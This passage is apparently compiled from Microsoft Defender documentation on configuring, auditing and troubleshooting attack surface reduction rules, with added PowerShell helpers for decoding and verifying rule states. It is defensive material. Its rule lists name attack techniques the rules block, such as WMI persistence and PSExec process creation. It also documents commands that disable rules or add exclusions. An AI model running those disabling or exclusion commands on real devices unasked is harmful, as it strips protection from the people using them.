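    return $byRule.Values | Sort-Object -Property Blocked, Audited -Descending
}

# Constructed sample rows standing in for a live response (offline run).
$sampleRows = @(
    [pscustomobject]@{ ActionType = 'AsrOfficeMacroWin32ApiCallsAudited'; EventCount = 12 }
    [pscustomobject]@{ ActionType = 'AsrOfficeMacroWin32ApiCallsBlocked'; EventCount = 3 }
    [pscustomobject]@{ ActionType = 'AsrPersistenceThroughWmiBlocked';    EventCount = 1 }
    [pscustomobject]@{ ActionType = 'AsrRansomwareAudited';               EventCount = 40 }
)
ConvertTo-AsrRuleSummary -Rows $sampleRows | Format-Table -AutoSize

# Against a tenant (requires $AccessToken):
# ConvertTo-AsrRuleSummary -Rows (Invoke-AsrHuntingQuery -AccessToken $AccessToken) | Format-Table -AutoSize
```

The ActionType names returned here are the same strings listed under "Advanced
hunting action type" in the rules reference earlier on this page, which is how the
per-rule rows map back to a rule GUID.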

Microsoft Defender for Endpoint machine timeline

An alternative to advanced hunting, but with a narrower scope, is the Microsoft
Defender for Endpoint machine timeline. You can view all the collected events of a
device for the past six months in Microsoft Defender XDR by going to the Machines
list, selecting a given machine, and then selecting the Timeline tab.

The following screenshot shows the Timeline view of these events on a given endpoint.
From this view, you can filter the events list based on any of the Event Groups along the
right-side pane. You can also enable or disable Flagged and Verbose events while
viewing alerts and scrolling through the historical timeline.

How to troubleshoot attack surface reduction rules?

The first and most immediate way to check locally, on a Windows device, which attack
surface reduction rules are enabled (and their configuration) is by using the PowerShell
cmdlets.

Here are a few other sources of information that Windows offers to troubleshoot attack
surface reduction rules' impact and operation.

Querying which rules are active

One of the easiest ways to determine if attack surface reduction rules are already
enabled is through a PowerShell cmdlet, Get-MpPreference.

Here's an example:

There are multiple attack surface reduction rules active, with different configured
actions.

To expand the above information on attack surface reduction rules, you can use the
properties AttackSurfaceReductionRules_Ids and/or
AttackSurfaceReductionRules_Actions.

Example:

PowerShell

Get-MpPreference | Select-Object -ExpandProperty AttackSurfaceReductionRules_Ids

The above shows all the IDs for attack surface reduction rules that have a setting
different from 0 (Not Configured).

The next step is then to list the actual actions (Block or Audit) that each rule is
configured with.

PowerShell

Get-MpPreference | Select-Object -ExpandProperty AttackSurfaceReductionRules_Actions
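
The two properties are parallel arrays: the n-th entry of
AttackSurfaceReductionRules_Actions is the action for the n-th GUID in
AttackSurfaceReductionRules_Ids, and the action is reported as a number. The PowerShell
below is an added example, not code from the Microsoft documentation: it zips the two
arrays into one readable table and labels the numeric actions (0 = Not configured,
1 = Block, 2 = Audit, 6 = Warn, the values Get-MpPreference reports). The rule-name
lookup is a partial map built from the rules reference earlier on this page; GUIDs that
are not in it are shown as such rather than guessed. Function names are ours.

```powershell
# Added example (not from the Microsoft documentation): decode the Ids/Actions
# arrays from Get-MpPreference into a table of rule, name and mode.

$AsrActionNames = @{ 0 = 'Not configured'; 1 = 'Block'; 2 = 'Audit'; 6 = 'Warn' }

# Partial GUID -> name map, taken from the rules reference on this page.
$AsrRuleNames = @{
    '3b576869-a4ec-4529-8536-b80a7769e899' = 'Block Office applications from creating executable content'
    '75668c1f-73b5-4cf0-bb93-3ecf5cb7cc84' = 'Block Office applications from injecting code into other processes'
    '26190899-1602-49e8-8b27-eb1d0a1ce869' = 'Block Office communication application from creating child processes'
    'e6db77e5-3df2-4cf1-b95a-636979351e5b' = 'Block persistence through WMI event subscription'
    'd1e49aac-8f56-4280-b9ba-993a6d77406c' = 'Block process creations originating from PSExec and WMI commands'
    'b2b3f03d-6a65-4f7b-a9c7-1c7ef74a9ba4' = 'Block untrusted and unsigned processes that run from USB'
    '92e97fa1-2edf-4476-bdd6-9dd0b4dddc7b' = 'Block Win32 API calls from Office macros'
    'c1db55ab-c21a-4637-bb3f-a12568109d35' = 'Use advanced protection against ransomware'
}

function ConvertTo-AsrRuleTable {
    # Pairs each rule ID with the action at the same index.
    param([string[]]$Ids, [int[]]$Actions)
    if ($Ids.Count -ne $Actions.Count) {
        throw "Ids/Actions arrays are out of step ($($Ids.Count) vs $($Actions.Count))"
    }
    for ($i = 0; $i -lt $Ids.Count; $i++) {
        $id = $Ids[$i].ToLower()
        $name = if ($AsrRuleNames.ContainsKey($id)) { $AsrRuleNames[$id] } else { '(not in local map)' }
        $action = if ($AsrActionNames.ContainsKey($Actions[$i])) { $AsrActionNames[$Actions[$i]] } else { "Unknown ($($Actions[$i]))" }
        [pscustomobject]@{ RuleId = $id; Name = $name; Action = $action }
    }
}

function Get-AsrRuleTable {
    # Reads the live configuration; empty arrays are handled when no rule is set.
    $p       = Get-MpPreference
    $ids     = @($p.AttackSurfaceReductionRules_Ids | Where-Object { $_ })
    $actions = @($p.AttackSurfaceReductionRules_Actions | Where-Object { $null -ne $_ })
    ConvertTo-AsrRuleTable -Ids $ids -Actions $actions
}

Get-AsrRuleTable | Sort-Object Action, Name | Format-Table -AutoSize
```

A rule that is absent from the table is Not configured (0); Get-MpPreference only lists
rules whose setting differs from that default, which is why the Ids array is usually
shorter than the full list of rules in the reference.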

Querying blocking and auditing events

Attack surface reduction rule events can be viewed within the Windows Defender log.

To access it, open Windows Event Viewer, and browse to Applications and Services
Logs > Microsoft > Windows > Windows Defender > Operational.
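
Reading that log interactively in Event Viewer is fine for one device; for a rollout you
want the same data as objects. The PowerShell below is an added example, not code from
the Microsoft documentation: it pulls the attack surface reduction events from the
Windows Defender Operational log with Get-WinEvent, using the event IDs 1121 (rule fired
in Block mode) and 1122 (rule fired in Audit mode) that Defender Antivirus writes for
ASR, and reads the rule GUID, process and path from each event's EventData by field
name rather than by position. The field names used for the columns are the Data names
as they appear in the event XML; if a field is missing from an event, that column is
simply empty. Function names are ours. Run it in an elevated session.

```powershell
# Added example (not from the Microsoft documentation): list and count ASR
# block/audit events from the Windows Defender Operational log.

# ASR event IDs in the Windows Defender Operational log.
$AsrEventIds = @{ 1121 = 'Block'; 1122 = 'Audit' }

function Get-AsrEventData {
    # Flattens the EventData section of one event into a hashtable keyed by the
    # Name attribute of each <Data> element, so fields are found by name.
    param([System.Diagnostics.Eventing.Reader.EventRecord]$Event)
    $xml  = [xml]$Event.ToXml()
    $data = @{}
    foreach ($d in $xml.Event.EventData.Data) {
        $data[$d.Name] = $d.'#text'
    }
    return $data
}

function Get-AsrEvents {
    # Returns one object per ASR event in the chosen window (newest first).
    param(
        [int]$MaxEvents = 500,
        [datetime]$Since = (Get-Date).AddDays(-7)
    )
    $filter = @{
        LogName   = 'Microsoft-Windows-Windows Defender/Operational'
        Id        = @($AsrEventIds.Keys)
        StartTime = $Since
    }
    # -ErrorAction SilentlyContinue: Get-WinEvent errors when nothing matches.
    Get-WinEvent -FilterHashtable $filter -MaxEvents $MaxEvents -ErrorAction SilentlyContinue |
        ForEach-Object {
            $d = Get-AsrEventData -Event $_
            [pscustomobject]@{
                Time    = $_.TimeCreated
                Mode    = $AsrEventIds[[int]$_.Id]
                RuleId  = $d['ID']            # rule GUID, as in the rules reference
                Process = $d['Process Name']  # process that triggered the rule
                Path    = $d['Path']          # file or target the rule acted on
                User    = $d['User']
            }
        }
}

# Per-rule, per-mode counts: rules that fire often in Audit deserve a look at
# their Process/Path columns before they are switched to Block.
Get-AsrEvents |
    Group-Object RuleId, Mode |
    Sort-Object Count -Descending |
    Select-Object Count, Name |
    Format-Table -AutoSize

# Full detail for one rule (constructed placeholder GUID):
# Get-AsrEvents | Where-Object RuleId -eq '00000000-0000-0000-0000-000000000000' | Format-List
```

Pair the RuleId column with the GUID list in the rules reference to name the rule; the
same events are what the MPOperationalEvents.txt file in the support package (next
section) contains in text form.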

Microsoft Defender Antimalware Protection Logs

You can also view rule events through the Microsoft Defender Antivirus dedicated
command-line tool, called mpcmdrun.exe, which can be used to manage, configure,
and automate tasks if needed.

You can find this utility in %ProgramFiles%\Windows Defender\MpCmdRun.exe. You must
run it from an elevated command prompt (that is, run as Admin).

To generate the support information, type MpCmdRun.exe -getfiles. After a while, several
logs will be packaged into an archive (MpSupportFiles.cab) and made available in
C:\ProgramData\Microsoft\Windows Defender\Support.

Extract that archive and you'll have many files available for troubleshooting purposes.

The most relevant files are as follows:

MPOperationalEvents.txt: This file contains the same level of information found in
Event Viewer for Windows Defender's Operational log.
MPRegistry.txt: In this file you can analyze all the current Windows Defender
configurations from the moment the support logs were captured.
MPLog.txt: This log contains more verbose information about all the
actions/operations of Windows Defender.



Enable attack surface reduction rules
Article • 02/13/2024

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR
Microsoft Defender Antivirus

Platforms

Windows

 Tip

Want to experience Defender for Endpoint? Sign up for a free trial.

Attack surface reduction rules help prevent actions that malware often abuses to
compromise devices and networks.

Requirements
Attack surface reduction features across Windows versions

You can set attack surface reduction rules for devices that are running any of the
following editions and versions of Windows:

Windows 11 Pro
Windows 11 Enterprise
Windows 10 Pro, version 1709 or later
Windows 10 Enterprise, version 1709 or later
Windows Server, version 1803 (Semi-Annual Channel) or later
Windows Server 2012 R2
Windows Server 2016
Windows Server 2019
Windows Server 2022

To use the entire feature-set of attack surface reduction rules, you need:

Microsoft Defender Antivirus as primary AV (real-time protection on)
Cloud-delivered protection on (some rules require it)
Windows 10 Enterprise E5 or E3 License

Although attack surface reduction rules don't require a Windows E5 license, with a
Windows E5 license, you get advanced management capabilities including monitoring,
analytics, and workflows available in Defender for Endpoint, as well as reporting and
configuration capabilities in the Microsoft Defender XDR portal. These advanced
capabilities aren't available with an E3 license, but you can still use Event Viewer to
review attack surface reduction rule events.

Each attack surface reduction rule contains one of four settings:

Not configured | Disabled: Disable the attack surface reduction rule
Block: Enable the attack surface reduction rule
Audit: Evaluate how the attack surface reduction rule would impact your
organization if enabled
Warn: Enable the attack surface reduction rule but allow the end user to bypass
the block

We recommend using attack surface reduction rules with a Windows E5 license (or
similar licensing SKU) to take advantage of the advanced monitoring and reporting
capabilities available in Microsoft Defender for Endpoint (Defender for Endpoint).
However, if you have another license, such as Windows Professional or Windows E3 that
doesn't include advanced monitoring and reporting capabilities, you can develop your
own monitoring and reporting tools on top of the events that are generated at each
endpoint when attack surface reduction rules are triggered (for example, Event
Forwarding).

 Tip

To learn more about Windows licensing, see Windows 10 Licensing and get the
Volume Licensing guide for Windows 10.

You can enable attack surface reduction rules by using any of these methods:

Microsoft Intune
Mobile Device Management (MDM)
Microsoft Configuration Manager
Group Policy
PowerShell

Enterprise-level management such as Intune or Microsoft Configuration Manager is
recommended. Enterprise-level management overwrites any conflicting Group Policy or
PowerShell settings on startup.

Exclude files and folders from attack surface reduction rules

You can exclude files and folders from being evaluated by most attack surface reduction
rules. This means that even if an attack surface reduction rule determines the file or
folder contains malicious behavior, it doesn't block the file from running.

) Important

Excluding files or folders can severely reduce the protection provided by attack
surface reduction rules. Excluded files will be allowed to run, and no report or event
will be recorded. If attack surface reduction rules are detecting files that you believe
shouldn't be detected, you should use audit mode first to test the rule. An
exclusion is applied only when the excluded application or service starts. For
example, if you add an exclusion for an update service that is already running, the
update service continues to trigger events until the service is stopped and
restarted.

When adding exclusions, keep these points in mind:

Exclusions are typically based on individual files or folders (using folder paths or
the full path of the file to be excluded).
Exclusion paths can use environment variables and wildcards. See Use wildcards in
the file name and folder path or extension exclusion lists.
When deployed through Group Policy or PowerShell, exclusions apply to all attack
surface reduction rules. Using Intune, it is possible to configure an exclusion for a
specific attack surface reduction rule. See Configure attack surface reduction rules
per-rule exclusions.
Exclusions can be added based on certificate and file hashes, by allowing specified
Defender for Endpoint file and certificate indicators. See Manage indicators.

Policy Conflict

1. If a conflicting policy is applied via MDM and GP, the setting applied from GP takes
precedence.

2. Attack surface reduction rules for managed devices now support merging settings
from different policies, to create a superset of policy for each device. Only the
settings that aren't in conflict are merged, while those that are in conflict aren't
added to the superset of rules. Previously, if two policies included conflicts for a
single setting, both policies were flagged as being in conflict, and no settings from
either profile would be deployed. Attack surface reduction rule merge behavior is as
follows:

Attack surface reduction rules from the following profiles are evaluated for
each device to which the rules apply:
Devices > Configuration profiles > Endpoint protection profile > Microsoft
Defender Exploit Guard > Attack Surface Reduction.
Endpoint security > Attack surface reduction policy > Attack surface
reduction rules.
Endpoint security > Security baselines > Microsoft Defender ATP Baseline
> Attack Surface Reduction Rules.
Settings that don't have conflicts are added to a superset of policy for the
device.
When two or more policies have conflicting settings, the conflicting settings
aren't added to the combined policy, while settings that don't conflict are
added to the superset policy that applies to a device.
Only the configurations for conflicting settings are held back.

Configuration methods
This section provides configuration details for the following configuration methods:

Intune
Custom profile in Intune
MDM
Microsoft Configuration Manager
Group Policy
PowerShell

The following procedures for enabling attack surface reduction rules include instructions
for how to exclude files and folders.

Intune

Device Configuration Profiles

1. Select Device configuration > Profiles. Choose an existing endpoint protection
profile or create a new one. To create a new one, select Create profile and enter
information for this profile. For Profile type, select Endpoint protection. If you've
chosen an existing profile, select Properties and then select Settings.
2. In the Endpoint protection pane, select Windows Defender Exploit Guard, then
select Attack Surface Reduction. Select the desired setting for each attack surface
reduction rule.

3. Under Attack Surface Reduction exceptions, enter individual files and folders. You
can also select Import to import a CSV file that contains files and folders to
exclude from attack surface reduction rules. Each line in the CSV file should be
formatted as follows:

C:\folder , %ProgramFiles%\folder\file , C:\path

4. Select OK on the three configuration panes. Then select Create if you're creating a
new endpoint protection file or Save if you're editing an existing one.

Endpoint security policy

1. Select Endpoint Security > Attack surface reduction. Choose an existing attack
surface reduction rule or create a new one. To create a new one, select Create
Policy and enter information for this profile. For Profile type, select Attack surface
reduction rules. If you've chosen an existing profile, select Properties and then
select Settings.

2. In the Configuration settings pane, select Attack Surface Reduction and then
select the desired setting for each attack surface reduction rule.

3. Under List of additional folders that need to be protected, List of apps that have
access to protected folders, and Exclude files and paths from attack surface
reduction rules, enter individual files and folders. You can also select Import to
import a CSV file that contains files and folders to exclude from attack surface
reduction rules. Each line in the CSV file should be formatted as follows:

C:\folder , %ProgramFiles%\folder\file , C:\path

4. Select Next on the three configuration panes, then select Create if you're creating
a new policy or Save if you're editing an existing policy.

Custom profile in Intune

You can use Microsoft Intune OMA-URI to configure custom attack surface reduction
rules. The following procedure uses the rule Block abuse of exploited vulnerable signed
drivers for the example.

1. Open the Microsoft Intune admin center. In the Home menu, click Devices, select
Configuration profiles, and then click Create profile.

2. In Create a profile, in the following two drop-down lists, select the following:

In Platform, select Windows 10 and later
In Profile type, select Templates
If attack surface reduction rules are already set through Endpoint security, in
Profile type, select Settings Catalog.

Select Custom, and then select Create.


3. The Custom template tool opens to step 1 Basics. In 1 Basics, in Name, type a
name for your template, and in Description you can type a description (optional).

4. Click Next. Step 2 Configuration settings opens. For OMA-URI Settings, click Add.
Two options now appear: Add and Export.

5. Click Add again. The Add Row OMA-URI Settings opens. In Add Row, do the
following:

In Name, type a name for the rule.

In Description, type a brief description.

In OMA-URI, type or paste the specific OMA-URI link for the rule that you're
adding. Refer to the MDM section in this article for the OMA-URI to use for
this example rule. For attack surface reduction rule GUIDs, see Per rule
descriptions in the article: Attack surface reduction rules.

In Data type, select String.

In Value, type or paste the GUID value, the = sign and the State value with no
spaces (GUID=StateValue). Where:
0: Disable (Disable the attack surface reduction rule)
1: Block (Enable the attack surface reduction rule)
2: Audit (Evaluate how the attack surface reduction rule would impact your
organization if enabled)
6: Warn (Enable the attack surface reduction rule but allow the end-user to
bypass the block)

6. Select Save. Add Row closes. In Custom, select Next. In step 3 Scope tags, scope
tags are optional. Do one of the following:

Select Select Scope tags, select the scope tag (optional), and then select
Next.
Or select Next.

7. In step 4 Assignments, in Included Groups, for the groups that you want this rule
to apply, select from the following options:

Add groups
Add all users
Add all devices

8. In Excluded groups, select any groups that you want to exclude from this rule, and
then select Next.

9. In step 5 Applicability Rules for the following settings, do the following:

In Rule, select either Assign profile if, or Don't assign profile if

In Property, select the property to which you want this rule to apply

In Value, enter the applicable value or value range

10. Select Next. In step 6 Review + create, review the settings and information you've
selected and entered, and then select Create.

Rules are active and live within minutes.

Note

Conflict handling:

If you assign a device two different attack surface reduction policies, potential
policy conflicts can occur, depending on whether rules are assigned different states,
whether conflict management is in place, and whether the result is an error.
Nonconflicting rules do not result in an error, and such rules are applied correctly.
The first rule is applied, and subsequent nonconflicting rules are merged into the
policy.

MDM
Use the ./Vendor/MSFT/Policy/Config/Defender/AttackSurfaceReductionRules
configuration service provider (CSP) to individually enable and set the mode for each
rule.

The following is a sample for reference, using GUID values from Attack surface reduction
rules reference.

OMA-URI path: ./Vendor/MSFT/Policy/Config/Defender/AttackSurfaceReductionRules

Value: 75668c1f-73b5-4cf0-bb93-3ecf5cb7cc84=2|3b576869-a4ec-4529-8536-b80a7769e899=1|d4f940ab-401b-4efc-aadc-ad5f3c50688a=2|d3e037e1-3eb8-44c8-a917-57927947596d=1|5beb7efe-fd9a-4556-801d-275e5ffc04cc=0|be9ba2d9-53ea-4cdc-84e5-9b1eeee46550=1

The values to enable (Block), disable, warn, or enable in audit mode are:

0: Disable (Disable the attack surface reduction rule)
1: Block (Enable the attack surface reduction rule)
2: Audit (Evaluate how the attack surface reduction rule would impact your
organization if enabled)
6: Warn (Enable the attack surface reduction rule but allow the end-user to bypass
the block). Warn mode is available for most of the attack surface reduction rules.

Use the ./Vendor/MSFT/Policy/Config/Defender/AttackSurfaceReductionOnlyExclusions
configuration service provider (CSP) to add exclusions.

Example:

OMA-URI path:

./Vendor/MSFT/Policy/Config/Defender/AttackSurfaceReductionOnlyExclusions

Value: c:\path|e:\path|c:\Exclusions.exe

Note

Be sure to enter OMA-URI values without spaces.
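The OMA-URI value above is a flat string of GUID=State pairs, and a typo in a GUID or a stray space silently configures nothing. The following PowerShell is an added example, not code from the Microsoft article, that builds the AttackSurfaceReductionRules value from a readable table and checks it before it is pasted into a custom Intune profile. The rule GUIDs are the ones from the sample value above; the states assigned to them, and the function names New-AsrRulesOmaUriValue and Test-OmaUriValue, are constructed for this example.

```powershell
# Added example (not from the Microsoft article): build and validate the
# AttackSurfaceReductionRules OMA-URI value offline.

# State codes as documented for the AttackSurfaceReductionRules CSP.
$AsrState = @{ Disable = 0; Block = 1; Audit = 2; Warn = 6 }

# Constructed rollout: rule GUID -> intended state name. GUIDs are from the
# article's sample value; the states are an example, not a recommendation.
$DesiredRules = [ordered]@{
    '75668c1f-73b5-4cf0-bb93-3ecf5cb7cc84' = 'Audit'
    '3b576869-a4ec-4529-8536-b80a7769e899' = 'Block'
    'd4f940ab-401b-4efc-aadc-ad5f3c50688a' = 'Audit'
    'd3e037e1-3eb8-44c8-a917-57927947596d' = 'Block'
    '5beb7efe-fd9a-4556-801d-275e5ffc04cc' = 'Disable'
    'be9ba2d9-53ea-4cdc-84e5-9b1eeee46550' = 'Block'
}

function New-AsrRulesOmaUriValue {
    param([Parameter(Mandatory)][System.Collections.IDictionary]$Rules)
    $pairs = foreach ($entry in $Rules.GetEnumerator()) {
        $id = $entry.Key.Trim().ToLowerInvariant()
        # A rule ID must be a GUID; anything else is ignored by the CSP.
        if ($id -notmatch '^[0-9a-f]{8}(-[0-9a-f]{4}){3}-[0-9a-f]{12}$') {
            throw "Not a rule GUID: '$($entry.Key)'"
        }
        if (-not $AsrState.ContainsKey($entry.Value)) {
            throw "Unknown state '$($entry.Value)' for $id (use Disable, Block, Audit or Warn)"
        }
        '{0}={1}' -f $id, $AsrState[$entry.Value]
    }
    # Pairs are separated by "|" with no spaces, as the article's sample shows.
    $pairs -join '|'
}

function Test-OmaUriValue {
    param([Parameter(Mandatory)][string]$Value)
    # The CSP value is parsed literally: whitespace breaks the pair it sits in.
    if ($Value -match '\s') { throw "OMA-URI value contains whitespace: '$Value'" }
    $true
}

$rulesValue = New-AsrRulesOmaUriValue -Rules $DesiredRules
Test-OmaUriValue -Value $rulesValue | Out-Null
Write-Output 'OMA-URI: ./Vendor/MSFT/Policy/Config/Defender/AttackSurfaceReductionRules'
Write-Output "Value:   $rulesValue"
```

Keeping the rule table in source control and generating the value from it means the Intune profile can be reviewed as a diff of rule states rather than as an opaque string.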

Microsoft Configuration Manager

1. In Microsoft Configuration Manager, go to Assets and Compliance > Endpoint
Protection > Windows Defender Exploit Guard.

2. Select Home > Create Exploit Guard Policy.

3. Enter a name and a description, select Attack Surface Reduction, and select Next.

4. Choose which rules will block or audit actions and select Next.

5. Review the settings and select Next to create the policy.

6. After the policy is created, select Close.

Warning

There is a known issue with the applicability of Attack Surface Reduction on Server
OS versions: the policy is marked as compliant without any actual enforcement.
Currently, there is no ETA for when this will be fixed.

Group Policy

Warning

If you manage your computers and devices with Intune, Configuration Manager, or
other enterprise-level management platform, the management software will
overwrite any conflicting Group Policy settings on startup.

1. On your Group Policy management computer, open the Group Policy Management
Console, right-click the Group Policy Object you want to configure and select
Edit.

2. In the Group Policy Management Editor, go to Computer configuration and
select Administrative templates.

3. Expand the tree to Windows components > Microsoft Defender Antivirus >
Microsoft Defender Exploit Guard > Attack surface reduction.

4. Select Configure Attack surface reduction rules and select Enabled. You can then
set the individual state for each rule in the options section. Select Show... and enter
the rule ID in the Value name column and your chosen state in the Value column
as follows:

0: Disable (Disable the attack surface reduction rule)
1: Block (Enable the attack surface reduction rule)
2: Audit (Evaluate how the attack surface reduction rule would impact your
organization if enabled)
6: Warn (Enable the attack surface reduction rule but allow the end-user to
bypass the block)

5. To exclude files and folders from attack surface reduction rules, select the Exclude
files and paths from Attack surface reduction rules setting and set the option to
Enabled. Select Show and enter each file or folder in the Value name column.
Enter 0 in the Value column for each item.

Warning

Do not use quotes as they are not supported for either the Value name
column or the Value column. The rule ID should not have any leading or
trailing spaces.

PowerShell

Warning

If you manage your computers and devices with Intune, Configuration Manager, or
another enterprise-level management platform, the management software
overwrites any conflicting PowerShell settings on startup.

1. Type powershell in the Start menu, right-click Windows PowerShell and select Run
as administrator.

2. Type one of the following cmdlets. (For more information, such as rule ID, refer to
Attack surface reduction rules reference.)

Task: Enable attack surface reduction rules
Cmdlet: Set-MpPreference -AttackSurfaceReductionRules_Ids <rule ID> -AttackSurfaceReductionRules_Actions Enabled

Task: Enable attack surface reduction rules in audit mode
Cmdlet: Add-MpPreference -AttackSurfaceReductionRules_Ids <rule ID> -AttackSurfaceReductionRules_Actions AuditMode

Task: Enable attack surface reduction rules in warn mode
Cmdlet: Add-MpPreference -AttackSurfaceReductionRules_Ids <rule ID> -AttackSurfaceReductionRules_Actions Warn

Task: Enable attack surface reduction rule Block abuse of exploited vulnerable signed drivers
Cmdlet: Add-MpPreference -AttackSurfaceReductionRules_Ids 56a863a9-875e-4185-98a7-b882c64b5ce5 -AttackSurfaceReductionRules_Actions Enabled

Task: Turn off attack surface reduction rules
Cmdlet: Add-MpPreference -AttackSurfaceReductionRules_Ids <rule ID> -AttackSurfaceReductionRules_Actions Disabled

Important

You must specify the state individually for each rule, but you can combine
rules and states in a comma-separated list.

In the following example, the first two rules are enabled, the third rule is
disabled, and the fourth rule is enabled in audit mode:

Set-MpPreference -AttackSurfaceReductionRules_Ids <rule ID 1>,<rule ID 2>,<rule ID 3>,<rule ID 4> -AttackSurfaceReductionRules_Actions Enabled, Enabled, Disabled, AuditMode

You can also use the Add-MpPreference PowerShell verb to add new rules to the
existing list.

Warning

Set-MpPreference overwrites the existing set of rules. If you want to add to
the existing set, use Add-MpPreference instead. You can obtain a list of rules
and their current state by using Get-MpPreference.

3. To exclude files and folders from attack surface reduction rules, use the following
cmdlet:

Add-MpPreference -AttackSurfaceReductionOnlyExclusions "<fully qualified path or resource>"

Continue to use Add-MpPreference -AttackSurfaceReductionOnlyExclusions to add
more files and folders to the list.

Important

Use Add-MpPreference to append or add apps to the list. Using the
Set-MpPreference cmdlet will overwrite the existing list.
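The two warnings above (Set-MpPreference replaces the whole rule list, and the device reports actions as numeric codes) are easy to get wrong in a rollout script. The following PowerShell is an added example, not code from the Microsoft article, that applies a small rollout plan with Add-MpPreference and then reads the effective state back with Get-MpPreference so the result is verified rather than assumed. It must run in an elevated session on a device running Microsoft Defender Antivirus. The "Block abuse of exploited vulnerable signed drivers" GUID is the one from the cmdlet table above; the second GUID is from the MDM sample earlier in this article; the plan itself, the exclusion path and the function names Get-AsrRuleState and Set-AsrPlan are constructed for this example.

```powershell
# Added example (not from the Microsoft article): append ASR rules, add an
# exclusion, and verify the device's effective state. Run elevated.

# Numeric action codes returned by Get-MpPreference, decoded to the names the
# -AttackSurfaceReductionRules_Actions parameter accepts.
$ActionName = @{ 0 = 'Disabled'; 1 = 'Enabled'; 2 = 'AuditMode'; 6 = 'Warn' }

# Constructed rollout plan: rule GUID -> action.
$Plan = [ordered]@{
    '56a863a9-875e-4185-98a7-b882c64b5ce5' = 'Enabled'    # vulnerable signed drivers rule, enforce
    '3b576869-a4ec-4529-8536-b80a7769e899' = 'AuditMode'  # newly introduced rule, audit first
}

function Get-AsrRuleState {
    # One object per configured rule, with the action code decoded.
    $pref = Get-MpPreference
    $ids     = @($pref.AttackSurfaceReductionRules_Ids)
    $actions = @($pref.AttackSurfaceReductionRules_Actions)
    for ($i = 0; $i -lt $ids.Count; $i++) {
        $code = [int]$actions[$i]
        [pscustomobject]@{
            RuleId = $ids[$i]
            Action = if ($ActionName.ContainsKey($code)) { $ActionName[$code] } else { "Unknown($code)" }
        }
    }
}

function Set-AsrPlan {
    param(
        [Parameter(Mandatory)][System.Collections.IDictionary]$Plan,
        [string[]]$Exclusions = @()
    )
    # Add-MpPreference takes parallel arrays: Ids[i] gets Actions[i]. Using Add
    # rather than Set keeps rules that were configured earlier by someone else.
    $ids     = @($Plan.Keys)
    $actions = @($Plan.Values)
    Add-MpPreference -AttackSurfaceReductionRules_Ids $ids -AttackSurfaceReductionRules_Actions $actions

    # Exclusions added this way apply to every rule, so keep the list minimal.
    foreach ($path in $Exclusions) {
        Add-MpPreference -AttackSurfaceReductionOnlyExclusions $path
    }

    # Verify: each planned rule must now report the planned action. A mismatch
    # usually means an enterprise management channel overwrote the setting.
    $current = Get-AsrRuleState
    foreach ($id in $ids) {
        $row = $current | Where-Object RuleId -eq $id
        if (-not $row -or $row.Action -ne $Plan[$id]) {
            Write-Warning "Rule $id expected $($Plan[$id]) but device reports '$($row.Action)'"
        }
    }
    $current
}

# Constructed exclusion path; replace with a real line-of-business binary.
Set-AsrPlan -Plan $Plan -Exclusions @('C:\Program Files\ExampleLOB\lobapp.exe') | Format-Table -AutoSize
```

The read-back step matters on Intune- or Configuration Manager-managed devices: as the warning at the top of this section says, the management channel overwrites conflicting local settings on startup, and the verification loop is where that shows up.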

Related articles
Attack surface reduction rules reference
Evaluate attack surface reduction
Attack surface reduction FAQ

Tip

Do you want to learn more? Engage with the Microsoft Security community in our
Tech Community: Microsoft Defender for Endpoint Tech Community.

Attack surface reduction frequently asked questions (FAQ)
FAQ

Applies to:

Microsoft Defender for Endpoint
Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR

Is attack surface reduction part of Windows?

Attack surface reduction was originally a feature of the suite of exploit guard features
introduced as a major update to Microsoft Defender Antivirus, in Windows 10, version
1709. Microsoft Defender Antivirus is the native antimalware component of Windows.
However, the full attack surface reduction feature-set is only available with a Windows
enterprise license. Also note that some Microsoft Defender Antivirus exclusions are
applicable to attack surface reduction rule exclusions. See Attack surface reduction rules
reference - Microsoft Defender Antivirus exclusions and attack surface reduction rules.

Do I need to have an enterprise license to run attack surface reduction rules?

The full set of attack surface reduction rules and features is only supported if you have
an enterprise license for Windows 10 or Windows 11. A limited number of rules may
work without an enterprise license. If you have Microsoft 365 Business, set Microsoft
Defender Antivirus as your primary security solution, and enable the rules through
PowerShell. Using attack surface reduction without an enterprise license isn't officially
supported and you won't be able to use the full capabilities of attack surface reduction.

To learn more about Windows licensing, see Windows 10 Licensing and get the
Volume Licensing guide for Windows 10.

Is attack surface reduction supported if I have an E3 license?

Yes. Attack surface reduction is supported for Windows Enterprise E3 and above.

Which features are supported with an E5 license?

All of the rules supported with E3 are also supported with E5.

E5 adds greater integration with Defender for Endpoint. With E5, you can view alerts in
real-time, fine-tune rule exclusions, configure attack surface reduction rules, and view
lists of event reports.

What are the currently supported attack surface reduction rules?

Attack surface reduction currently supports all of the rules below.

What rules to enable? All, or can I turn on individual rules?

To help you figure out what's best for your environment, we recommend that you
enable attack surface reduction rules in audit mode. With this approach, you can
determine the possible effect on your organization, for example on your line-of-business
applications.

How do attack surface reduction rules exclusions work?

For attack surface reduction rules, if you add one exclusion, it affects every attack
surface reduction rule.

Attack surface reduction rules exclusions support wildcards, paths, and environmental
variables. For more information on how to use wildcards in attack surface reduction
rules, see configure and validate exclusions based on file extension and folder location.
Be aware of the following items about attack surface reduction rules exclusions
(including wildcards and environment variables):

Most attack surface reduction rules exclusions are independent from Microsoft
Defender Antivirus exclusions. However, Microsoft Defender Antivirus exclusions
do apply to some attack surface reduction rules. See Attack surface reduction rules
reference - Microsoft Defender Antivirus exclusions and attack surface reduction
rules.
Wildcards can't be used to define a drive letter.
If you want to exclude more than one folder in a path, use multiple instances of
\*\ to indicate multiple nested folders (for example, c:\Folder\*\*\Test).
Microsoft Endpoint Configuration Manager supports wildcards (* or ?).
If you want to exclude a file that contains random characters (automated file
generation), you can use the '?' symbol (for example, C:\Folder\fileversion?.docx).
Attack surface reduction exclusions in Group Policy don't support quotes (the
engine natively handles long paths, spaces, etc., so there's no need to use quotes).
Attack surface reduction rules run under the NT AUTHORITY\SYSTEM account, so
environment variables are limited to machine variables.
